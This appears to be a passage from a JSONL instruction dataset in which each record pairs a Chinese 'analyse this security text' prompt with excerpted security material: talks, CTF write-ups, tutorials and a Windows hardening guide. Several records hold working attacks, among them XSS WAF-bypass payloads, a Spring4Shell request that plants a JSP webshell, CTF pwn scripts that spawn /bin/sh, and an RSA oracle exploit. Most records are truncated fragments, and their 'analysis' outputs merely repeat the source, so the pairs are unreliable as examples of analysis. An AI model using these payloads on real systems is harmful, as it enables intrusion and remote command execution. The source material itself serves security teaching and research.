k1); sum -= delta; } /* end cycle */ v[0]=v0; v[1]=v1; } uint64_t u64(char * s){ uint64_t result = 0; for (int i = 7 ; i >=0 ;i--){ result = (result << 8) | (0x00000000000000ff&s[i]);", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nACL Steganography: Permissions to Hide Your Porn by Michael Perklin Michael Perklin BaISc, MSIA, CISSP, EnCE, ACE Security Professional Corporate Investigator (Cyber-Crime) Digital Forensic Examiner Computer Geek + Legal Support hybrid In This Talk... What is Steganography? Historical examples of physical and digital forms How do they work? ACL Steganography - a new scheme Demo How It Works What Is Steganography? Greek origin and means \"concealed writing\" steganos (στεγανός) meaning \"covered or protected\" graphei (γραφή) meaning \"writing\" The term was first coined in 1499, but there are many earlier examples Basically, hiding something in plain sight Classical Examples Classical Example: Tattoo Tattoo under hair Encoder tattoos a slaves scalp Decoder shaves the messengers hair Problem: The message must be delayed to allow time for hair regrowth Also... Tattoos Are Permanent Oops Classical Example: Morse Stitch morse code into a sweater/jacket worn by a messenger Messenger hand-delivers one message while actually delivering two Classical Example: Invisible Ink Write secrets with lemon juice Allow to dry Decode with heat (candle, match, hair dryer, iron) Decode With Heat Digital Steganographic Methods Digital Example: Photos Files can be encoded as colour information embedded in a photo Most common type of digital steganography Based on the fact that only super-humans can tell the difference between Chartreuse and Lemon Photo Steganography Each pixel is assigned a colour with an RGB colour code The last bit of this 8-bit code is overwritten with encoded data #DFFF00 is chartreuse #DFFF01 is.... one of the yellows 8 adjacent pixels with 8 slightly-adjusted colours allows 1 byte of encoded information Audio Steganography Same principle as photographic steganography, but with audio Humans cant easily tell the difference between 400hz and 401hz, especially if the note isnt sustained Alter each frame of audio with 1 bit of encoded information Digital Example: x86 Ops Inform", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDisassemble Flash Lite 3.0 SWF file (How to protect your ActionScript source code) TAKESAKO @32bit.in <takesako@gmail.com> Japan is a birthplace of \"K-ON!\" and \"K-TAI\" nJapanese cellular phones are called \"K-TAI\" nJapanese cellular phones have made original evolution because the communication method isn't an universal standard and so on nthose have many functions, such as infrared ray, pictographs, electronic money, and television, nTherefore, In Japan, there aren't NOKIA's nJapanese people want smart phone now nBut, many old K-TAI still remain in Japan, and nmany people are playing Flash Lite game on K-TAI! n GREE, mobage, mixi  SWF File Format Specification n SWF Technology Center | Adobe Developer Connection nhttp://www.adobe.com/devnet/swf.html nVERSION 10 nAlexis SWF Reference nhttp://sswf.sourceforge.net/SWFalexref.html nFlash VERSION 1, 2, 3, 4, 5, 6,  n Flash 1.0 Flash 4.0 FlashLite 1.1 n 2001 Alexis' SWF Reference http://sswf.sourceforge.net/SWFalexref.html : : : : SWF Flash Lite 1.1+ Hello world! nhello.swf (75 byte) 46 57 53 04 4b 00 00 00 60 00 3f c0 00 3f c0 00 0c 02 00 43 02 33 33 33 17 03 96 12 00 00 6f 00 00 48 65 6c 6c 6f 20 77 6f 72 6c 64 21 0a 00 1d 00 4d 09 01 00 60 0a 3e 80 0a 3e 80 60 08 6f 00 05 01 01 00 01 00 00 40 00 00 00 > swfdump -D hello.swf [HEADER] File version: 4 [HEADER] File size: 75 [HEADER] Frame rate: 12.000000 [HEADER] Frame count: 2 [HEADER] Movie width: 102.00 [HEADER] Movie height: 102.00 [009] 3 SETBACKGROUNDCOLOR (33/33/33) [00c] 23 DOACTION ( 18 bytes) action: Push String:\"o\" String:\"Hello world!n\" ( 0 bytes) action: SetVariable ( 0 bytes) action: End [025] 13 DEFINEEDITTEXT defines id 0001 variable \"o\" [004] 5 PLACEOBJECT places id 0001 at depth 0001 | Matrix | CXForm r g b a | 1.000 0.000 0.00 | mul 1.0 1.0 1.0 1.0 | 0.000 1.000 0.00 | add 0 0 0 0 [001] 0 SHOWFRAME 1 (00:00:00,000) [000] 0 END 1. How to read SWF flie nSWF File magic (4byte) 46 57 53 04 4b 00 00 00 60 00 3f c0 00 3f c0 00 0c 02 00 43 02 33 33 33 17 03 96 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x00 前 如有技术交流或渗透测试/代码审计/红队向培训/红蓝对抗评估需求的朋友 欢迎联系QQ/VX-547006660 0x01 前奏 最近在测试某知名安全商的过程中发现其处重要业务的域竟出现了难得的研WAF如此来勾起了 我的兴趣~ 仔细研究该业务点后发现某处传参会直接将传参内容写JS中的危险 Aut hor: J 0o1ey 于是与WAF的次交锋便从此刻开始~ 0x02 平静的闭合与常规操作 由上图的输出位置可知WAF情况下我们只需要通过 三个符号来闭合前半部分JS再//注释后JS再直接eval执JS代码即可 构造Payload 由于evalalert括号等太敏感~毫疑问直接被WAF秒了 )] %27)];eval(alert('xss'))// Aut hor: J 0o1ey 那只能经验与思路来逐渐替换掉这些敏感的函数关键词了~ 0x03 多法组合绕过WAF 解决eval 先解决的是eval被拦截的问题 在JS中绕过对于eval的拦截可以使Function()动态构造函数 这到了 Function()构造函数的个特性, Function()构造函数虽然不是很常但是了解下还是很有必要的 不管是通过函数定义语句还是函数直接量表达式函数的定义都要使 function()关键字 但是单函数还可以通过Function()构造函数来定义如 这的实际效果和下的代码是等价的 Function()构造函数可以传任意数量的字符串实参最后个实参所表示的本是函数体它可以包含任意的 Javascript 语句每条语句之间分号分割 我们依据这个特性就可以使Function()来代替eval() EG: 两者是等效的 var f = new Function(\"x\",\"y\",\"return x*y\"); var f=function(x,y){x*y}; Function(alert('xss')) eval(alert('xss')) Aut hor: J 0o1ey 改造我们的Payload 发现未拦截 直接Function内使函数 不出意外直接GG了~ ?%27]);Function(test)()// %27]);Function(alert('xss'))()// Aut hor: J 0o1ey 下思考的就是如何绕过对于函数的检测 绕过函数检测 直接alert既然被拦截我们就使atob来解密base64的的JS EG: 构造Payload atob(\"YWxlcnQoInhzcyIp\") //base64编码的alert('xss') %27]);Function(atob('YWxlcnQoInhzcyIp')))()// Aut hor: J 0o1ey Md,寄了~估计是正则检测了atob + ()的函数使... 没事再JS的个特性反引号来代替括号引号 构造Payload atob`YWxlcnQoInhzcyIp` %27]);Function(atob`YWxlcnQoInhzcyIp`)()// Aut hor: J 0o1ey 弹弹弹弹尾纹 0x04 总结 本初XSS绕过WAF总共了四个简单的TIPS 1.输出在JS内的闭合与注释 2.Function()来代替eval() 3.atob解密base64加密的JS 4.反引号代替括号与引号 所以多数业务场景并不是没有漏洞部分情况是受挖掘者脑中的利链与姿势所限 各种法组合起来达到漏洞利成功的效果是次有趣的经历 Aut hor: J 0o1ey", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 0x00 json是什么 JSON (JavaScript Object Notation) 是一种轻量级的数据交换格式易于人阅读和编写同时也易于机器解析和生成 JSON 构建基于两种结构: - 名称 值对的集合 - 值的有序列表 - 结构可以嵌套 - 示例 ``` json {\"sites\":[ {\"name\":\"Runoob\", \"url\":\"www.runoob.com\"}, {\"name\":\"Google\", \"url\":\"www.google.com\"}, {\"name\":\"Taobao\", \"url\":\"www.taobao.com\"} ]} ``` ## 0x01 fastjson 是什么 Fastjson是Alibaba开发的Java语言编写的高性能JSON库https://github.com/alibaba/fastjson 采用假定有序快速匹配的算法它可以解析JSON格式的字符串支持将Java Bean序列化为JSON字符串也可以从JSON字符串反序列化到JavaBeanFastjson接口简单易用广泛使用在缓存序列化协议交互Web输出Android客户端等目前有2个主要接口toJsonString和parseObject来分别实现序列化和反序列化 ### fastjson反序列化框架 ![fastjson反序列化框架图](../pictures/fastjson_1.png) - 在Fastjson反序列化框架中JSON是门面类提供一些静态方法如parseparseObject其主要功能都是在DefaultJSONParser类中实现的 - DefaultJSONParser引用了ParserConfig类该类主要保存一些相关配置信息也引用了JSONLexerBase类用来处理字符分析序列化用到的是JavaBeanSerializer类而反序列化用到的是JavaBeanDeserializer类 ### fastjson 如何使用 首先定义一个User.java代码如下 ``` java public class User { private Long id; private String name; public Long getId() { return id; } public void setId(Long id) { this.id = id; } public String getName() { return name; } public void setName(String name) { this.name = name; } } ``` 序列化的代码如下: ```java import com.alibaba.fastjson.JSON; User guestUser = new User(); guestUser.setId(2L); guestUser.setName(\"guest\"); String jsonString = JSON.toJSONString(guestUser); System.out.println(jsonString); ``` 反序列化的代码示例 ```java String jsonString = \"{\\\"name\\\":\\\"guest\\\",\\\"id\\\":12}\"; User user = JSON.parseObject(jsonString, User.class); ``` ## 0x02 反序列化可能有什么问题 parseObject()方法在处理过程中会调用反序列化目标类的所有 settergetter和is方法如上User类的例子其成员字段id和name都有各自get和set的操作故这些函数都会在反序列化的过程中被调用以便为类实例的字段赋值 * 如果这些settergetter函数或者类的构造函数中存在执行命令的操作是不是就会造成命令执行漏洞 * 或者系统某些库在实现反序列化时的某些函数或一些继承的库重写了存在问题也可能造成反序列化漏洞 ### fastjson的反序列漏洞 #### fastjson 安全特性 - Feature.SupportNonPublicField 才能打开非公有属性的反序列化处理 - @type 可以指定反序列化任意类调用其set/get/is方法 #### fastjson 反序列漏洞poc分析 即使打开了autotype配置也不是所有库都能被利用触发反序列化因为fastjson库实现checkAutoType 函数以检查需要进行反序列化的库是否在黑名单中如果是则中断执行 有研究人员发现通过TemplatesImpl类可以绕过检查且造成反序列化漏洞poc 简化如下 ```java final Str", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDigital Vengeance Exploiting the Most Notorious C&C Toolkits @professor__plum Disclaimer The views expressed herein do not necessarily state or reflect the views of my current or former employers. I am not responsible for any use or misuse of the information provided. Implementation of the information given is at your own risk. Backstory The malware that was used would have slipped or probably got past 90% of internet defenses that are out there today in private industry Joseph Demarest, assistant director of the FBIs cyber division The sophisticated attack hackers obtained data on tens of millions of current and former customers and employees in a sophisticated attack Anthem  identified an extremely sophisticated cyber attack RSA \"It is simply not possible to beat these hackers James A. Lewis Cybersecurity Expert at Center for Strategic and International Studies (CSIS) Government and non-government entities are under constant attack by evolving and advanced persistent threats and criminal actors. These adversaries are sophisticated, well-funded, and focused. Office of Personnel Management \"The threat is very persistent, adaptive and sophisticated  and it is here to stay, SWIFT RAT terminology  Client  Victim  Target  C2 Server  Attacker  Victim  Adversary  Retaliator - one who returns assault in kind *icons credit Open Security Architecture Sophisticated attack hit list Prior Art  Buffer overflow exploit by Andrzej Dereszowski  Follow on work by Jos Wetzels APT1 & Poison Ivy Remote file download exploit by Shawn Denbow and Jesse Hertz Follow on work by Jos Wetzels New work Gh0st RAT Gh0st RAT Most notably identified by C2 traffic which start with the 5 byte marker Gh0st (or other 5 byte marker) 00000, 7hero, ABCDE, Adobe, ag0ft, apach, Assas, attac, B1X6Z, BEiLa, BeiJi, Blues, ByShe, cb1st, chevr, CHINA, cyl22, DrAgOn, EXXMM, Eyes1, FKJP3, FLYNN, FWAPR, FWKJG, GWRAT, Gh0st, Gi0st, GM110, GOLDt, HEART, Hello, https, HTTPS, HXWAN, Heart, httpx, IM007, ITore, kaGni, KOBBX, Kr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0xcsandker  csandker  RSS Feed //Posts //History of Windows //Archive //Tags & Search //ME  Switch Theme Offensive Windows IPC Internals 2: RPC 21 Feb 2021 (Last Updated: 19 5 2021) >> The Series >> Introduction >> History >> RPC Messaging >> RPC Protocol Sequence >> RPC Interfaces >> RPC Binding >> Anonymous & Authenticated Bindings >> Registration Flags >> Security Callbacks >> Authenticated Bindings >> Well-known vs Dynamic Endpoints >> RPC Communication Flow Contents: >> Sample Implementation >> Access Matrix >> Attack Surface >> Finding Interesting Targets >> RPC Servers >> RPC Clients >> Unauthorized Access >> Client Impersonation >> Server Non-Impersonation >> MITM Authenticated NTLM Connections >> MITM Authenticated GSS_NEGOTIATE Connections >> References This is part 2 of my series: Offensive Windows IPC Internals. If you missed part one and want to take a look, youll nd it here: Offensive Windows IPC Internals 1: Named Pipes. Part 2 was originally planned to be about LPC & ALPC, but as it turns out its quite time consuming to dig out all the undocumented bits and tricks about these technologies. Therefore i made the discussion to publish my knowledge about RPC rst before turning my head towards ALPC once again. The reason why i originally planed to publish LPC & ALPC before RPC is because RPC uses ALPC under the hood when used locally and even more: RPC is the intended solution for fast local inter process communication as RPC can be instructed to process local communication via a special ALPC protocol sequence (but youll nd that out while reading on). Anyhow, the lesson here is (i guess) that sometimes its better to pause on a thing and get your head cleared up and make progress with something else before you get lost in something that is just not ready to reveal its mysteries to you. Get a coffee and a comfy chair and buckle up for RPC Remote Procedure Calls (RPC) is a technology to enable data communication between a client and a server across process a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 1 A journey from high level languages, through assembly, to the running process https://github.com/hasherezade/malware_training_vol1 Creating Executables Compiling, linking, etc  The code of the application must be executed by a processor  Depending on the programming language that we choose, the application may contain a native code, or an intermediate code Compiling, linking, etc  Native languages  compiled to the code that is native to the CPU MyApp.exe Native code Compiling, linking, etc  Interpreted languages  require to be translated to the native code by an interpreter MyApp.exe Intermediate code interpreter Compiling, linking, etc  Programming languages:  compiled to native code (processor-specific), i.e. C/C++, assembly  with intermediate code (bytecode, p-code): i.e. C# (compiled to Common Intermediate Language: CIL previously known as MSIL), Java  interpreted i.e. Python, Ruby Compiling, linking, etc  PowerShell scripts  Python, Ruby  Java  C#, Visual Basic  C/C++, Rust  assembly High level Low level abstraction Compiling, linking, etc  From an assembly code to a native application:  Preprocessing  Assembling  Linking MyApp.asm MyApp.inc preprocess assemble MyApp.obj link Used_library.lib MyApp.exe Native code Compiling, linking, etc  From an assembly code to a native application: demo in assembly  MASM  Microsoft Macro Asembler  Windows-only  YASM  independent Assembler built upon NASM (after development of NASM was suspended)  Multiplatform  YASM has one advantage over MASM: allows to generate binary files (good for writing shellcodes in pure assembly) Compiling, linking, etc  Using YASM to create PE files  YASM will be used to create object file  LINK (from MSVC) will be used for linking yasm f win64 demo.asm link demo.obj /entry:main /subsystem:console /defaultlib:kernel32.lib /defaultlib:user32.lib Compiling, linking, etc  Using MASM to create PE files  MASM will be used to create object file  LINK (from MSVC) will be used for linking ml /c de", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ncodegate WriteUp By StrawHat.md Author: Straw Hat codegate WriteUp By StrawHat.md Pwn ARVM VIMT isolated File-V Web CAFE superbee babyFirst myblog Crypto PrimeGenerator Dark Arts Blockchain Ankiwoom Invest Pwn ARVM from pwn import * context.arch='arm' context.log_level='debug' sc=[\"mov r0,#0\",\"mov r1,#0x2000\",\"mov r2,#12\",\"mov r7,#3\",\"svc #0\"] #[\"add r4,pc,#128\",\"ldr r5,[r4]\",\"mvn r5,r5\",\"str r5,[r4]\"] sc+=[\"mov r0,#0x2004\",\"mov r1,#0\",\"mov r2,#0\",\"mov r3,#0x2000\",\"ldr r7,[r3]\",\"svc #0\"] pay=asm('\\n'.join(sc)) print(pay.hex()) p=remote('15.165.92.159',1234) p.sendafter(b'Your Code :',pay) p.sendlineafter(b'Edit',b'1') p.recvuntil(b'Secret code :') p.sendlineafter(b'Code?',p.recvline().strip()) p.send(p32(1)+b'/bin/sh\\x00') p.send(p32(11)+b'/bin/sh\\x00') p.interactive() VIMT #! /usr/bin/python2 # coding=utf-8 import sys from pwn import * import hashlib import requests #context.log_level = 'debug' context(arch='amd64', os='linux') def Log(name): log.success(name+' = '+hex(eval(name))) if(len(sys.argv)==1): #local sh = process([\"./app\"]) else: #remtoe # ctf@3.38.59.103 -p 1234 conn = ssh(user='ctf', host='3.38.59.103', port=1234, password=\"ctf1234_smiley\") sh = conn.run(\"/home/ctf/app\") x = 113 y = 38 cur_x = 0 # pos to be written cur_y = 0 def setY(val): sh.send('\\x1B') sh.sendline('set y=%d'%(val)) def setX(target, C): global cur_x if(target==cur_x): sh.send(C) cur_x = (cur_x+6)%x return setY(y-1) while(True): if(cur_x==target): setY(cur_y) sh.send(C) cur_x = (cur_x+6)%x break else: isolated singal handler race condition race between pop & clear will hijack stack_ptr to -1 sh.send('A') cur_x = (cur_x+6)%x def Compile(): sh.send('\\x1B') sh.sendline('compile') sh.recvuntil('-'*113) sh.recvuntil('-'*113) def WriteLine(cont): global cur_y for i in range(0, len(cont)): setX(i, cont[i]) WriteLine('int main(){system(\"cat flag\");}//') Compile() sh.interactive() ''' def Test(x): arr = [0]*x for i in range(10000): arr[(i*6)%x] = 1 for i in arr: if(i==0): print \"No\" return prin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Spring框架Data Binding与JDK 9+导致的远程代码执行漏洞CVE-2022-22965 在JDK 9+上运行的Spring MVC或Spring WebFlux应用程序可能存在通过数据绑定执行远程代码RCE的漏洞 现在已知的利用方法要求应用程序以WAR部署的形式在Tomcat上运行然而该漏洞的性质更为普遍可能有其他方法可以利用它 参考链接 - <https://tanzu.vmware.com/security/cve-2022-22965> - <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/> ## 漏洞环境 执行如下命令启动一个Spring WebMVC 5.3.17服务 ``` docker compose up -d ``` 服务启动后访问`http://your-ip:8080/?name=Bob&age=25`即可看到一个演示页面 ## 漏洞复现 发送如下数据包即可修改目标的Tomcat日志路径与后缀利用这个方法写入一个JSP文件 ``` GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1 ``` ![](1.png) 然后访问刚写入的JSP Webshell执行任意命令 ``` http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=id ``` ![](2.png) 注意你需要在利用完成后将`class.module.classLoader.resources.context.parent.pipeline.first.pattern`清空否则每次请求都会写入新的恶意代码在JSP Webshell中导致这个文件变得很大发送如下数据包将其设置为空 ``` GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern= HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Wi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom crypto_commons.netcat.netcat_commons import nc, send, receive_until_match from crypto_commons.oracle.lsb_oracle import lsb_oracle def oracle(s, payload): send(s, 'l') receive_until_match(s, \"\\:\\>\\>\", None) send(s, str(payload)) send(s, str(1)) send(s, str(1)) data = receive_until_match(s, \"\\:\\>\\>\", None) return \"bit is wrong\" in data def multiplicate(x, e, n): return (pow(2, e, n) * x) % n def main(): url = \"47.75.53.178\" port = 9999 s = nc(url, port) data = receive_until_match(s, \"\\:\\>\\>\", None).split(\"\\n\") e = int(data[1]) n = int(data[2]) print(e, n) send(s, 'r') receive_until_match(s, \"\\:\\>\\>\", None).split(\"\\n\") send(s, 'test') data = receive_until_match(s, \"\\:\\>\\>\", None).split(\"\\n\") ct = int(data[0]) lsb_oracle(ct, lambda x: multiplicate(x, e, n), n, lambda ct: oracle(s,ct)) main()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHardware Backdooring is practical Jonathan Brossard (Toucan System) DISCLAIMER  We are not  terrorists . We won't release our PoC backdoor.  The x86 architecture is plagued by legacy. Governments know. The rest of the industry : not so much.  There is a need to discuss the problems in order to find solutions...  This is belived to be order of magnitudes better over existing backdoors/malware Agenda  Motivation : state level backdooring ?  Coreboot & x86 architecture  State of the art in rootkitting, romkitting  Introducing Rakshasa  Epic evil remote carnal pwnage (of death)  Why cryptography (Truecrypt/Bitlocker/TPM) won't save us...  Backdooring like a state Could a state (eg : China) backdoor all new computers on earth ? A bit of x86 architecture State of the art, previous work Previous work  Early 80s : Brain virus, targets the MBR  80s, 90s : thousands of such viruses  2007, John Heasman (NGS Software) Blackhat US: backdoor EFI bootloader  2009, Anibal Saco and Alfredo Ortega (Core security), CanSecWest : patch/flash a Pheonix-Award Bios  2009, Kleissner, Blackhat US : Stoned bootkit. Bootkit Windows, Truecrypt. Load arbitrary unsigned kernel module.  2010, Kumar and Kumar (HITB Malaysia) : vbootkit bootkitting of Windows 7.  Piotr Bania, Konboot : bootkit any Windows (32/64b)  2012 : Snare (Syscan) : EFI rootkitting DEMO : Bootkitting Windows Introducing Rakshasa Goals : create the perfect backdoor  Persistant  Stealth (virtually undetectable)  Portable (OS independant)  Remote access, remote updates  State level quality : plausible deniability, non attribution  Cross network perimeters (firewalls...)  Redundancy Rakshasa : design  Core components : Coreboot SeaBios iPXE payloads Built on top of free software : portability, non attribution, cheap dev (~4 weeks of work), really hard to detect (without false positives).  Payload : Reverse Engineered/Refactored konboot payload (2 days of work). Rakshasa  Flash the BIOS (Coreboot + PCI roms such as iPXE)  Flash the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Secure-Win <p align=\"center\"> <img src=\"../../../assets/img/banner/Secure-Win.jpg\" width=\"90%\"> </p> - `windows 加固+维护+应急响应参考` --- ## 大纲 * **[文件](#文件)** * [可疑文件](#可疑文件) * **[系统](#系统)** * [开机启动](#开机启动) * [账号](#账号) * [进程](#进程) * [注册表](#注册表) * [日志](#日志) * [系统日志](#系统日志) * [日志工具](#日志工具) * [第三方程序日志](#第三方程序日志) * **[网络](#网络)** * [端口](#端口) * [RDP](#rdp) * [DNS](#dns) * [windows系统共享](#windows系统共享) * **[防御密码抓取](#防御密码抓取)** * **[防御Responder欺骗](#防御-responder-欺骗)** * **[阻止非 PPL 进程修改 PPL 进程的 token](#阻止非-ppl-进程修改-ppl-进程的-token)** --- ## 文件 ### 可疑文件 - 回收站 - 浏览器下载目录 - 浏览器历史记录 **最近文件** 开始-运行输入 `%UserProfile%\\Recent` - `C:\\Documents and Settings\\Administrator\\Recent` - `C:\\Documents and Settings\\Default User\\Recent` 查看指定时间范围包括上传文件夹的访问请求 ``` findstr /s /m /I UploadFiles *.log ``` **临时文件** - `c:\\windows\\temp\\` --- ## 系统 开启组策略编辑器 `gpedit.msc` 控制面板: <kbd>win</kbd> 输入 `control` **信息** 系统信息: cmd 输入 `systeminfo` ### 开机启动 开始-运行输入 `msconfig` - `(ProfilePath)\\Start Menu\\Programs\\Startup` **注册表项** 在 cmd 下使用 ``` REG query HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run REG query HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Runonce REG query HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run REG query HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run REG query HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce REG query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunonceEx ``` **服务自启动** 开始-运行输入 `services.msc` **计划任务** - `C:\\Windows\\System32\\Tasks\\` - `C:\\Windows\\SysWOW64\\Tasks\\` - `C:\\Windows\\tasks\\` 开始-运行输入 `taskschd.msc` - **cmd 下使用** ``` schtasks ``` ### 账号 开始-运行输入 `lusrmgr.msc` **cmd 下使用** - `net user` : 显示用户账号信息 - `wmic UserAccount get` : 列出当前系统所有账户 **注册表项** ``` REG query HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users ``` **查看用户目录** 新建账号会在以下目录生成一个用户目录查看是否有新建用户目录 - Window 2003 : `C:\\Documents and Settings` - Window 2008R2 : `C:\\Users\\` **查看服务器是否存在隐藏账号克隆账号** 可以使用 D 盾工具其集成了对克隆账号检测的功能 **加固** - Micr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDo you like to read? I know how to take over your Kindle with an e-book Slava Makkaveev How popular is Amazon Kindle? 10th Generation  Kindle Oasis  Kindle Paperwhite  Kindle 9th Generation  Kindle Oasis 8th Generation  Kindle Oasis  Kindle 7th Generation  Kindle Voyage  Kindle Paperwhite  Kindle 6th Generation  Kindle Paperwhite The 11th Generation is on the way 5th Generation  Kindle Paperwhite  Kindle 4th Generation  Kindle Touch  Kindle 3rd Generation  Kindle Keyboard 2nd Generation  Kindle DX  Kindle 1st Generation  Kindle The easiest way to remotely reach a Kindle is through an e-book How to deliver an e-book to my Kindle device? When you are logged into your Amazon account  From your browser (Chrome browser extension)  From your desktop (PC application)  From your Android device (Android application) Without authentication  Via USB cable  From your email (as an attachment) to xxx@kindle.com  The ability to spoof was fixed at the end of 2020  A verification link will be sent to your Amazon account A phishing campaign is the right way to go Dozens of free online libraries are open to everyone  Kindle Store  Project Gutenberg  Open Library  The Online Books Page  The Literature Network  Classic Reader  Classic Bookshelf  Chest of Books  Fiction.us  PublicLiterature.org  Authorama  Bibliomania  International Children's Digital Library ... A malware e-book can be easily uploaded Inside the Kindle E-reader How to research a Kindle device? The official source code consists of third-party open source projects with small Amazon tweaks 1) The latest firmware is available for download 2) It is possible to Jailbreak Kindle Touch Architecture Linux OS D-Bus LIPC + app registry Native apps (busybox) JRE Booklets Pillow Java Apps HTML/Javascript Webkit X.org User Interface High-level services Low-level services / system What Kindle components are responsible for parsing e-books? The /usr/bin/scanner service  Periodically scans /mnt/us/documents for new files  Uses extractor libr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1990, 1991 The Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" This code is derived from software contributed to Berkeley by .\\\" Chris Torek and the American National Standards Committee X3, .\\\" on Information Processing Systems. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All advertising materials mentioning features or use of this software .\\\" must display the following acknowledgement: .\\\" This product includes software developed by the University of .\\\" California, Berkeley and its contributors. .\\\" 4. Neither the name of the University nor the names of its contributors .\\\" may be used to endorse or promote products derived from this software .\\\" without specific prior written permission. .\\\" .\\\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\\\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\\\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\\\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\\\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\\\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\\\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\\\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\\\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\\\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\\\" SUCH", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Insecure Randomness ## Summary * [GUID / UUID](#guid--uuid) * [GUID Versions](#guid-versions) * [Tools](#tools) * [References](#references) ## GUID / UUID ### GUID Versions Version identification: `xxxxxxxx-xxxx-Mxxx-Nxxx-xxxxxxxxxxxx` The four-bit M and the 1- to 3-bit N fields code the format of the UUID itself. | Version | Notes | |----------|--------| | 0 | Only `00000000-0000-0000-0000-000000000000` | | 1 | based on time, or clock sequence | | 2 | reserved in the RFC 4122, but ommitted in many implementations | | 3 | based on a MD5 hash | | 4 | randomly generated | | 5 | based on a SHA1 hash | ### Tools * [intruder-io/guidtool](https://github.com/intruder-io/guidtool) - A tool to inspect and attack version 1 GUIDs ```ps1 $ guidtool -i 95f6e264-bb00-11ec-8833-00155d01ef00 UUID version: 1 UUID time: 2022-04-13 08:06:13.202186 UUID timestamp: 138691299732021860 UUID node: 91754721024 UUID MAC address: 00:15:5d:01:ef:00 UUID clock sequence: 2099 $ guidtool 